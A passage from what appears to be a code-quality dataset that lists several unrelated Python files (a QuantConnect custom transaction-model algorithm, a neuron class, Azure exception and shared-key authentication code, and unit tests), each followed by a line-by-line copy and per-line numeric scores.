\"\"\"\n", " for keyrange in self.partition_map.keys():\n", " if keyrange.Contains(partition_key):\n", " return keyrange\n", "\n", " return None\n", "\n", " def _GetIntersectingRanges(self, partition_key):\n", " \"\"\"Gets the intersecting ranges based on the partition key.\n", " \"\"\"\n", " partitionkey_ranges = set()\n", " intersecting_ranges = set()\n", "\n", " if partition_key is None:\n", " return list(self.partition_map.keys())\n", "\n", " if isinstance(partition_key, prange.Range):\n", " partitionkey_ranges.add(partition_key)\n", " elif isinstance(partition_key, list):\n", " for key in partition_key:\n", " if key is None:\n", " return list(self.partition_map.keys())\n", " elif isinstance(key, prange.Range):\n", " partitionkey_ranges.add(key)\n", " else:\n", " partitionkey_ranges.add(prange.Range(key, key))\n", " else:\n", " partitionkey_ranges.add(prange.Range(partition_key, partition_key))\n", "\n", " for partitionKeyRange in partitionkey_ranges:\n", " for keyrange in self.partition_map.keys():\n", " if keyrange.Intersect(partitionKeyRange):\n", " intersecting_ranges.add(keyrange)\n", "\n", " return intersecting_ranges" ]
[ 0.043478260869565216, 0.023809523809523808, 0, 0.01282051282051282, 0.012658227848101266, 0.01282051282051282, 0.013333333333333334, 0.014084507042253521, 0.017241379310344827, 0, 0.0125, 0.02040816326530612, 0, 0.013157894736842105, 0.013513513513513514, 0.012987012987012988, 0.013888888888888888, 0.012658227848101266, 0.012658227848101266, 0.09090909090909091, 0, 0.012345679012345678, 0, 0, 0, 0, 0.02631578947368421, 0.01098901098901099, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011235955056179775, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0.00847457627118644, 0.1111111111111111, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.029411764705882353 ]
123
0.005731
false
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals. # Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from clr import AddReference AddReference("System") AddReference("QuantConnect.Algorithm") AddReference("QuantConnect.Common") from System import * from QuantConnect import * from QuantConnect.Algorithm import * from QuantConnect.Orders import * from QuantConnect.Orders.Fees import * from QuantConnect.Securities import * from QuantConnect.Orders.Fills import * import numpy as np import random ### <summary> ### Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting. ### QuantConnect allows you to model all orders as deeply and accurately as you need. ### </summary> ### <meta name="tag" content="trading and orders" /> ### <meta name="tag" content="transaction fees and slippage" /> ### <meta name="tag" content="custom buying power models" /> ### <meta name="tag" content="custom transaction models" /> ### <meta name="tag" content="custom slippage models" /> ### <meta name="tag" content="custom fee models" /> class CustomModelsAlgorithm(QCAlgorithm): '''Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting. QuantConnect allows you to model all orders as deeply and accurately as you need.''' def Initialize(self): self.SetStartDate(2013,10,1) # Set Start Date self.SetEndDate(2013,10,31) # Set End Date self.security = self.AddEquity("SPY", Resolution.Hour) self.spy = self.security.Symbol # set our models self.security.SetFeeModel(CustomFeeModel(self)) self.security.SetFillModel(CustomFillModel(self)) self.security.SetSlippageModel(CustomSlippageModel(self)) self.security.SetBuyingPowerModel(CustomBuyingPowerModel(self)) def OnData(self, data): open_orders = self.Transactions.GetOpenOrders(self.spy) if len(open_orders) != 0: return if self.Time.day > 10 and self.security.Holdings.Quantity <= 0: quantity = self.CalculateOrderQuantity(self.spy, .5) self.Log(f"MarketOrder: {quantity}") self.MarketOrder(self.spy, quantity, True) # async needed for partial fill market orders elif self.Time.day > 20 and self.security.Holdings.Quantity >= 0: quantity = self.CalculateOrderQuantity(self.spy, -.5) self.Log(f"MarketOrder: {quantity}") self.MarketOrder(self.spy, quantity, True) # async needed for partial fill market orders # If we want to use methods from other models, you need to inherit from one of them class CustomFillModel(ImmediateFillModel): def __init__(self, algorithm): self.algorithm = algorithm self.absoluteRemainingByOrderId = {} self.random = Random(387510346) def MarketFill(self, asset, order): absoluteRemaining = order.AbsoluteQuantity if order.Id in self.absoluteRemainingByOrderId.keys(): absoluteRemaining = self.absoluteRemainingByOrderId[order.Id] fill = super().MarketFill(asset, order) absoluteFillQuantity = int(min(absoluteRemaining, self.random.Next(0, 2*int(order.AbsoluteQuantity)))) fill.FillQuantity = np.sign(order.Quantity) * absoluteFillQuantity if absoluteRemaining == absoluteFillQuantity: fill.Status = OrderStatus.Filled if self.absoluteRemainingByOrderId.get(order.Id): self.absoluteRemainingByOrderId.pop(order.Id) else: absoluteRemaining = absoluteRemaining - absoluteFillQuantity self.absoluteRemainingByOrderId[order.Id] = absoluteRemaining fill.Status = OrderStatus.PartiallyFilled self.algorithm.Log(f"CustomFillModel: {fill}") return fill class CustomFeeModel(FeeModel): def __init__(self, algorithm): self.algorithm = algorithm def GetOrderFee(self, parameters): # custom fee math fee = max(1, parameters.Security.Price * parameters.Order.AbsoluteQuantity * 0.00001) self.algorithm.Log(f"CustomFeeModel: {fee}") return OrderFee(CashAmount(fee, "USD")) class CustomSlippageModel: def __init__(self, algorithm): self.algorithm = algorithm def GetSlippageApproximation(self, asset, order): # custom slippage math slippage = asset.Price * 0.0001 * np.log10(2*float(order.AbsoluteQuantity)) self.algorithm.Log(f"CustomSlippageModel: {slippage}") return slippage class CustomBuyingPowerModel(BuyingPowerModel): def __init__(self, algorithm): self.algorithm = algorithm def HasSufficientBuyingPowerForOrder(self, parameters): # custom behavior: this model will assume that there is always enough buying power hasSufficientBuyingPowerForOrderResult = HasSufficientBuyingPowerForOrderResult(True) self.algorithm.Log(f"CustomBuyingPowerModel: {hasSufficientBuyingPowerForOrderResult.IsSufficient}") return hasSufficientBuyingPowerForOrderResult
[ "# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.\n", "# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "from clr import AddReference\n", "AddReference(\"System\")\n", "AddReference(\"QuantConnect.Algorithm\")\n", "AddReference(\"QuantConnect.Common\")\n", "\n", "from System import *\n", "from QuantConnect import *\n", "from QuantConnect.Algorithm import *\n", "from QuantConnect.Orders import *\n", "from QuantConnect.Orders.Fees import *\n", "from QuantConnect.Securities import *\n", "from QuantConnect.Orders.Fills import *\n", "import numpy as np\n", "import random\n", "\n", "### <summary>\n", "### Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting.\n", "### QuantConnect allows you to model all orders as deeply and accurately as you need.\n", "### </summary>\n", "### <meta name=\"tag\" content=\"trading and orders\" />\n", "### <meta name=\"tag\" content=\"transaction fees and slippage\" />\n", "### <meta name=\"tag\" content=\"custom buying power models\" />\n", "### <meta name=\"tag\" content=\"custom transaction models\" />\n", "### <meta name=\"tag\" content=\"custom slippage models\" />\n", "### <meta name=\"tag\" content=\"custom fee models\" />\n", "class CustomModelsAlgorithm(QCAlgorithm):\n", " '''Demonstration of using custom fee, slippage, fill, and buying power models for modelling transactions in backtesting.\n", " QuantConnect allows you to model all orders as deeply and accurately as you need.'''\n", "\n", " def Initialize(self):\n", " self.SetStartDate(2013,10,1) # Set Start Date\n", " self.SetEndDate(2013,10,31) # Set End Date\n", " self.security = self.AddEquity(\"SPY\", Resolution.Hour)\n", " self.spy = self.security.Symbol\n", "\n", " # set our models\n", " self.security.SetFeeModel(CustomFeeModel(self))\n", " self.security.SetFillModel(CustomFillModel(self))\n", " self.security.SetSlippageModel(CustomSlippageModel(self))\n", " self.security.SetBuyingPowerModel(CustomBuyingPowerModel(self))\n", "\n", "\n", " def OnData(self, data):\n", " open_orders = self.Transactions.GetOpenOrders(self.spy)\n", " if len(open_orders) != 0: return\n", "\n", " if self.Time.day > 10 and self.security.Holdings.Quantity <= 0:\n", " quantity = self.CalculateOrderQuantity(self.spy, .5)\n", " self.Log(f\"MarketOrder: {quantity}\")\n", " self.MarketOrder(self.spy, quantity, True) # async needed for partial fill market orders\n", "\n", " elif self.Time.day > 20 and self.security.Holdings.Quantity >= 0:\n", " quantity = self.CalculateOrderQuantity(self.spy, -.5)\n", " self.Log(f\"MarketOrder: {quantity}\")\n", " self.MarketOrder(self.spy, quantity, True) # async needed for partial fill market orders\n", "\n", "# If we want to use methods from other models, you need to inherit from one of them\n", "class CustomFillModel(ImmediateFillModel):\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", " self.absoluteRemainingByOrderId = {}\n", " self.random = Random(387510346)\n", "\n", " def MarketFill(self, asset, order):\n", " absoluteRemaining = order.AbsoluteQuantity\n", "\n", " if order.Id in self.absoluteRemainingByOrderId.keys():\n", " absoluteRemaining = self.absoluteRemainingByOrderId[order.Id]\n", "\n", " fill = super().MarketFill(asset, order)\n", " absoluteFillQuantity = int(min(absoluteRemaining, self.random.Next(0, 2*int(order.AbsoluteQuantity))))\n", " fill.FillQuantity = np.sign(order.Quantity) * absoluteFillQuantity\n", " \n", " if absoluteRemaining == absoluteFillQuantity:\n", " fill.Status = OrderStatus.Filled\n", " if self.absoluteRemainingByOrderId.get(order.Id):\n", " self.absoluteRemainingByOrderId.pop(order.Id)\n", " else:\n", " absoluteRemaining = absoluteRemaining - absoluteFillQuantity\n", " self.absoluteRemainingByOrderId[order.Id] = absoluteRemaining\n", " fill.Status = OrderStatus.PartiallyFilled\n", " self.algorithm.Log(f\"CustomFillModel: {fill}\")\n", " return fill\n", "\n", "class CustomFeeModel(FeeModel):\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", "\n", " def GetOrderFee(self, parameters):\n", " # custom fee math\n", " fee = max(1, parameters.Security.Price\n", " * parameters.Order.AbsoluteQuantity\n", " * 0.00001)\n", " self.algorithm.Log(f\"CustomFeeModel: {fee}\")\n", " return OrderFee(CashAmount(fee, \"USD\"))\n", "\n", "class CustomSlippageModel:\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", "\n", " def GetSlippageApproximation(self, asset, order):\n", " # custom slippage math\n", " slippage = asset.Price * 0.0001 * np.log10(2*float(order.AbsoluteQuantity))\n", " self.algorithm.Log(f\"CustomSlippageModel: {slippage}\")\n", " return slippage\n", "\n", "class CustomBuyingPowerModel(BuyingPowerModel):\n", " def __init__(self, algorithm):\n", " self.algorithm = algorithm\n", "\n", " def HasSufficientBuyingPowerForOrder(self, parameters):\n", " # custom behavior: this model will assume that there is always enough buying power\n", " hasSufficientBuyingPowerForOrderResult = HasSufficientBuyingPowerForOrderResult(True)\n", " self.algorithm.Log(f\"CustomBuyingPowerModel: {hasSufficientBuyingPowerForOrderResult.IsSufficient}\")\n", " return hasSufficientBuyingPowerForOrderResult" ]
[ 0, 0.012345679012345678, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.037037037037037035, 0.02702702702702703, 0.029411764705882353, 0.02564102564102564, 0.02631578947368421, 0.025, 0.05263157894736842, 0.07142857142857142, 0, 0.07142857142857142, 0.01639344262295082, 0.023255813953488372, 0.06666666666666667, 0.018867924528301886, 0.015625, 0.01639344262295082, 0.016666666666666666, 0.017543859649122806, 0.019230769230769232, 0.023809523809523808, 0.008, 0.011235955056179775, 0, 0, 0.03571428571428571, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.024390243902439025, 0, 0, 0, 0, 0.009708737864077669, 0, 0, 0, 0, 0.009708737864077669, 0, 0.011904761904761904, 0.023255813953488372, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0.1111111111111111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0.020833333333333332, 0, 0, 0, 0, 0.01098901098901099, 0.010638297872340425, 0.009174311926605505, 0.018867924528301886 ]
128
0.008981
false
from python.src.neurons.neurons import Neuron from python.src.neurons.activation_functions.tanh_activation import TanhActivation from python.src.neurons.activation_functions.sigmoid_activation import SigmoidActivation from python.src.neurons.activation_functions.sine_activation import SineActivation # This type is like most models. It requires all of the # signals to have been received before sending any of # its connections. class ReceiveAllNeuron(Neuron): def __init__(self, activation = SineActivation()): # Call inherited class. Neuron.__init__(self, activation) self.signal_receivedTracker = {} def on_reset(self): # gets the neruon ready to fire again for key in self.signal_receivedTracker: self.signal_receivedTracker[key] = False def on_inbound_added(self, connection): self.signal_receivedTracker[connection.id] = False def on_inbound_removed(self, connection): self.signal_receivedTracker.pop(connection.id, None) def on_signal_received(self, value, connection_id): # If all signals have been received, the output is set # and the node fires. if (len(self.signal_receivedTracker) and self.signal_receivedTracker[connection_id]): return if (connection_id): self.signal_receivedTracker[connection_id] = True if (not self.allSignalsReceived()): return self.output = self.activation.fn(self.accumulated_input_signals) self.fire() def allSignalsReceived(self): return all(self.signal_receivedTracker.values())
[ "from python.src.neurons.neurons import Neuron\n", "from python.src.neurons.activation_functions.tanh_activation import TanhActivation\n", "from python.src.neurons.activation_functions.sigmoid_activation import SigmoidActivation\n", "from python.src.neurons.activation_functions.sine_activation import SineActivation\n", "\n", "\n", "\n", "# This type is like most models. It requires all of the\n", "# signals to have been received before sending any of\n", "# its connections.\n", "class ReceiveAllNeuron(Neuron):\n", " def __init__(self, activation = SineActivation()):\n", " # Call inherited class.\n", " Neuron.__init__(self, activation)\n", " self.signal_receivedTracker = {}\n", "\n", "\n", " def on_reset(self):\n", " # gets the neruon ready to fire again\n", " for key in self.signal_receivedTracker:\n", " self.signal_receivedTracker[key] = False\n", "\n", "\n", " def on_inbound_added(self, connection):\n", " self.signal_receivedTracker[connection.id] = False\n", "\n", "\n", " def on_inbound_removed(self, connection):\n", " self.signal_receivedTracker.pop(connection.id, None)\n", "\n", "\n", " def on_signal_received(self, value, connection_id):\n", " # If all signals have been received, the output is set\n", " # and the node fires. \n", " if (len(self.signal_receivedTracker) and \n", " self.signal_receivedTracker[connection_id]): return\n", "\n", " if (connection_id):\n", " self.signal_receivedTracker[connection_id] = True\n", "\n", " if (not self.allSignalsReceived()): return\n", " \n", " self.output = self.activation.fn(self.accumulated_input_signals)\n", " self.fire() \n", "\n", "\n", " def allSignalsReceived(self):\n", " return all(self.signal_receivedTracker.values())\n" ]
[ 0, 0.012048192771084338, 0.011235955056179775, 0.012048192771084338, 0, 0, 0, 0.017857142857142856, 0, 0, 0.03125, 0.03636363636363636, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0.017857142857142856, 0, 0.02564102564102564, 0.02, 0.015625, 0, 0, 0, 0, 0.0196078431372549, 0.0625, 0, 0.03571428571428571, 0, 0, 0.029411764705882353, 0 ]
48
0.009027
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- __author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>' __version__ = '1.0.0' class AzureException(Exception): pass class AzureHttpError(AzureException): def __init__(self, message, status_code): super(AzureHttpError, self).__init__(message) self.status_code = status_code def __new__(cls, message, status_code, *args, **kwargs): if cls is AzureHttpError: if status_code == 404: cls = AzureMissingResourceHttpError elif status_code == 409: cls = AzureConflictHttpError return AzureException.__new__(cls, message, status_code, *args, **kwargs) class AzureConflictHttpError(AzureHttpError): def __init__(self, message, status_code): super(AzureConflictHttpError, self).__init__(message, status_code) class AzureMissingResourceHttpError(AzureHttpError): def __init__(self, message, status_code): super(AzureMissingResourceHttpError, self).__init__(message, status_code)
[ "#-------------------------------------------------------------------------\r\n", "# Copyright (c) Microsoft. All rights reserved.\r\n", "#\r\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n", "# you may not use this file except in compliance with the License.\r\n", "# You may obtain a copy of the License at\r\n", "# http://www.apache.org/licenses/LICENSE-2.0\r\n", "#\r\n", "# Unless required by applicable law or agreed to in writing, software\r\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n", "# See the License for the specific language governing permissions and\r\n", "# limitations under the License.\r\n", "#--------------------------------------------------------------------------\r\n", "\r\n", "__author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>'\r\n", "__version__ = '1.0.0'\r\n", "\r\n", "\r\n", "class AzureException(Exception):\r\n", " pass\r\n", "\r\n", "\r\n", "class AzureHttpError(AzureException):\r\n", " def __init__(self, message, status_code):\r\n", " super(AzureHttpError, self).__init__(message)\r\n", " self.status_code = status_code\r\n", "\r\n", " def __new__(cls, message, status_code, *args, **kwargs):\r\n", " if cls is AzureHttpError:\r\n", " if status_code == 404:\r\n", " cls = AzureMissingResourceHttpError\r\n", " elif status_code == 409:\r\n", " cls = AzureConflictHttpError\r\n", " return AzureException.__new__(cls, message, status_code, *args, **kwargs)\r\n", "\r\n", "\r\n", "class AzureConflictHttpError(AzureHttpError):\r\n", " def __init__(self, message, status_code):\r\n", " super(AzureConflictHttpError, self).__init__(message, status_code)\r\n", "\r\n", "\r\n", "class AzureMissingResourceHttpError(AzureHttpError):\r\n", " def __init__(self, message, status_code):\r\n", " super(AzureMissingResourceHttpError, self).__init__(message, status_code)\r\n" ]
[ 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338 ]
45
0.001116
false
# -*- coding: utf-8 -*- import cPickle as pickle # This script processes import_job records from the admin module that are in the # 'import' state. This indicates that the lines have been validated, and the user # has selected any to be ignored, the remaining lines should be imported. # jobs = db(db.admin_import_job.status == 'import').select() for job in jobs: # Create a form to use for validation and insertion. form = SQLFORM(db['%s_%s' % (job.module, job.resource)]) # Loop over each line flagged for import lines = db((db.admin_import_line.import_job==job.id) & (db.admin_import_line.status == 'import')).select() imported_lines = 0 failed_lines = 0 for line in lines: if not line.valid: # Skip invalid lines. failed_lines += 1 continue # Extract pickled data. try: data = pickle.loads(line.data) except pickle.UnpicklingError: failed_lines += 1 db.admin_import_line[line.id] = dict( errors = 'Could not unpickle data') continue # Try and insert. data.update({'_formname': 'import'}) if form.accepts(data, None, formname='import'): db.admin_import_line[line.id] = dict( status = 'imported', errors = None) imported_lines += 1 else: db.admin_import_line[line.id] = dict( errors = 'Import Failed: %s' % ', '.join(form.errors)) failed_lines += 1 # Update job status. if not failed_lines: db(db.admin_import_job.id==job.id).update(status='imported') else: # If one or more lines failed, put back into processed state, # for user to examine further. db(db.admin_import_job.id==job.id).update(status='processed') # Explicitly commit DB operations when running from Cron db.commit()
[ "# -*- coding: utf-8 -*-\n", "import cPickle as pickle\n", "\n", "# This script processes import_job records from the admin module that are in the\n", "# 'import' state. This indicates that the lines have been validated, and the user\n", "# has selected any to be ignored, the remaining lines should be imported.\n", "#\n", "\n", "jobs = db(db.admin_import_job.status == 'import').select()\n", "for job in jobs:\n", " # Create a form to use for validation and insertion.\n", " form = SQLFORM(db['%s_%s' % (job.module, job.resource)])\n", "\n", " # Loop over each line flagged for import\n", " lines = db((db.admin_import_line.import_job==job.id) &\n", " (db.admin_import_line.status == 'import')).select()\n", " imported_lines = 0\n", " failed_lines = 0\n", " for line in lines:\n", " if not line.valid:\n", " # Skip invalid lines.\n", " failed_lines += 1\n", " continue\n", "\n", " # Extract pickled data.\n", " try:\n", " data = pickle.loads(line.data)\n", " except pickle.UnpicklingError:\n", " failed_lines += 1\n", " db.admin_import_line[line.id] = dict(\n", " errors = 'Could not unpickle data')\n", " continue\n", " \n", " # Try and insert.\n", " data.update({'_formname': 'import'})\n", " if form.accepts(data, None, formname='import'):\n", " db.admin_import_line[line.id] = dict(\n", " status = 'imported',\n", " errors = None)\n", " imported_lines += 1\n", " else:\n", " db.admin_import_line[line.id] = dict(\n", " errors = 'Import Failed: %s' % ', '.join(form.errors))\n", " failed_lines += 1\n", "\n", "\n", " # Update job status.\n", " if not failed_lines:\n", " db(db.admin_import_job.id==job.id).update(status='imported')\n", " else:\n", " # If one or more lines failed, put back into processed state,\n", " # for user to examine further.\n", " db(db.admin_import_job.id==job.id).update(status='processed')\n", "\n", "# Explicitly commit DB operations when running from Cron\n", "db.commit()\n" ]
[ 0, 0, 0, 0.012345679012345678, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.1111111111111111, 0, 0, 0, 0, 0.04878048780487805, 0.05714285714285714, 0, 0, 0, 0.02666666666666667, 0, 0, 0, 0.04, 0, 0.014492753623188406, 0, 0, 0, 0.014285714285714285, 0, 0, 0 ]
56
0.006959
false
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from intern.resource.boss.resource import CoordinateFrameResource class TestCoordFrameResource(unittest.TestCase): def setUp(self): self.cf = CoordinateFrameResource('frame') def test_not_valid_volume(self): self.assertFalse(self.cf.valid_volume()) def test_get_route(self): self.assertEqual( '{}'.format(self.cf.name), self.cf.get_route()) def test_get_list_route(self): self.assertEqual('', self.cf.get_list_route()) def test_voxel_unit_setter(self): exp = 'millimeters' self.cf.voxel_unit = exp self.assertEqual(exp, self.cf.voxel_unit) def test_validate_voxel_units_nm(self): exp = 'nanometers' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_micro(self): exp = 'micrometers' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_mm(self): exp = 'millimeters' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_cm(self): exp = 'centimeters' self.assertEqual(exp, self.cf.validate_voxel_units(exp)) def test_validate_voxel_units_bad(self): with self.assertRaises(ValueError): self.cf.validate_voxel_units('centimet')
[ "# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "#\n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "\n", "import unittest\n", "from intern.resource.boss.resource import CoordinateFrameResource\n", "\n", "class TestCoordFrameResource(unittest.TestCase):\n", " def setUp(self):\n", " self.cf = CoordinateFrameResource('frame')\n", "\n", " def test_not_valid_volume(self):\n", " self.assertFalse(self.cf.valid_volume())\n", "\n", " def test_get_route(self):\n", " self.assertEqual(\n", " '{}'.format(self.cf.name), self.cf.get_route())\n", "\n", " def test_get_list_route(self):\n", " self.assertEqual('', self.cf.get_list_route())\n", "\n", " def test_voxel_unit_setter(self):\n", " exp = 'millimeters'\n", " self.cf.voxel_unit = exp\n", " self.assertEqual(exp, self.cf.voxel_unit)\n", "\n", " def test_validate_voxel_units_nm(self):\n", " exp = 'nanometers'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_micro(self):\n", " exp = 'micrometers'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_mm(self):\n", " exp = 'millimeters'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_cm(self):\n", " exp = 'centimeters'\n", " self.assertEqual(exp, self.cf.validate_voxel_units(exp))\n", "\n", " def test_validate_voxel_units_bad(self):\n", " with self.assertRaises(ValueError):\n", " self.cf.validate_voxel_units('centimet')\n", "\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 ]
56
0.018222
false
# coding=utf-8 #------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. #-------------------------------------------------------------------------- import time import keyring import ast import base64 import hmac import hashlib import datetime import requests from requests.auth import AuthBase from msrest.authentication import Authentication from msrest import Serializer from msrest.serialization import TZ_UTC try: from urlparse import urlparse, parse_qs except ImportError: from urllib.parse import urlparse, parse_qs class SharedKeyAuth(AuthBase): headers_to_sign = [ 'content-encoding', 'content-language', 'content-length', 'content-md5', 'content-type', 'date', 'if-modified-since', 'if-match', 'if-none-match', 'if-unmodified-since', 'range'] def __init__(self, header, account_name, key): self._header = header self._account_name = account_name self._key = key def __call__(self, request): if not request.headers.get('ocp-date'): now = datetime.datetime.utcnow() now = now.replace(tzinfo=TZ_UTC) request.headers['ocp-date'] = Serializer.serialize_rfc(now) url = urlparse(request.url) uri_path = url.path uri_path = uri_path.replace('%5C', '/') uri_path = uri_path.replace('%2F', '/') # method to sign string_to_sign = request.method + '\n' # get headers to sign request_header_dict = { key.lower(): val for key, val in request.headers.items() if val} request_headers = [ str(request_header_dict.get(x, '')) for x in self.headers_to_sign] string_to_sign += '\n'.join(request_headers) + '\n' # get ocp- header to sign ocp_headers = [] for name, value in request.headers.items(): if 'ocp-' in name and value: ocp_headers.append((name.lower(), value)) for name, value in sorted(ocp_headers): string_to_sign += "{}:{}\n".format(name, value) # get account_name and uri path to sign string_to_sign += "/{}{}".format(self._account_name, uri_path) # get query string to sign if it is not table service query_to_sign = parse_qs(url.query) for name in sorted(query_to_sign.keys()): value = query_to_sign[name][0] if value: string_to_sign += "\n{}:{}".format(name, value) # sign the request auth_string = "SharedKey {}:{}".format( self._account_name, self._sign_string(string_to_sign)) request.headers[self._header] = auth_string return request def _sign_string(self, string_to_sign): _key = self._key.encode('utf-8') string_to_sign = string_to_sign.encode('utf-8') try: key = base64.b64decode(_key) except TypeError: raise ValueError("Invalid key value: {}".format(self._key)) signed_hmac_sha256 = hmac.HMAC(key, string_to_sign, hashlib.sha256) digest = signed_hmac_sha256.digest() return base64.b64encode(digest).decode('utf-8') class SharedKeyCredentials(Authentication): def __init__(self, account_name, key): super(SharedKeyCredentials, self).__init__() self.auth = SharedKeyAuth(self.header, account_name, key) def signed_session(self): session = super(SharedKeyCredentials, self).signed_session() session.auth = self.auth return session
[ "# coding=utf-8\n", "#-------------------------------------------------------------------------\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "# Licensed under the MIT License. See License.txt in the project root for\n", "# license information.\n", "#--------------------------------------------------------------------------\n", "\n", "import time\n", "import keyring\n", "import ast\n", "import base64\n", "import hmac\n", "import hashlib\n", "import datetime\n", "\n", "import requests\n", "from requests.auth import AuthBase\n", "from msrest.authentication import Authentication\n", "from msrest import Serializer\n", "from msrest.serialization import TZ_UTC\n", "\n", "try:\n", " from urlparse import urlparse, parse_qs\n", "\n", "except ImportError:\n", " from urllib.parse import urlparse, parse_qs\n", "\n", "class SharedKeyAuth(AuthBase):\n", "\n", " headers_to_sign = [\n", " 'content-encoding',\n", " 'content-language',\n", " 'content-length',\n", " 'content-md5',\n", " 'content-type',\n", " 'date',\n", " 'if-modified-since',\n", " 'if-match',\n", " 'if-none-match',\n", " 'if-unmodified-since',\n", " 'range']\n", "\n", " def __init__(self, header, account_name, key):\n", " self._header = header\n", " self._account_name = account_name\n", " self._key = key\n", "\n", " def __call__(self, request):\n", "\n", " if not request.headers.get('ocp-date'):\n", " now = datetime.datetime.utcnow()\n", " now = now.replace(tzinfo=TZ_UTC)\n", " request.headers['ocp-date'] = 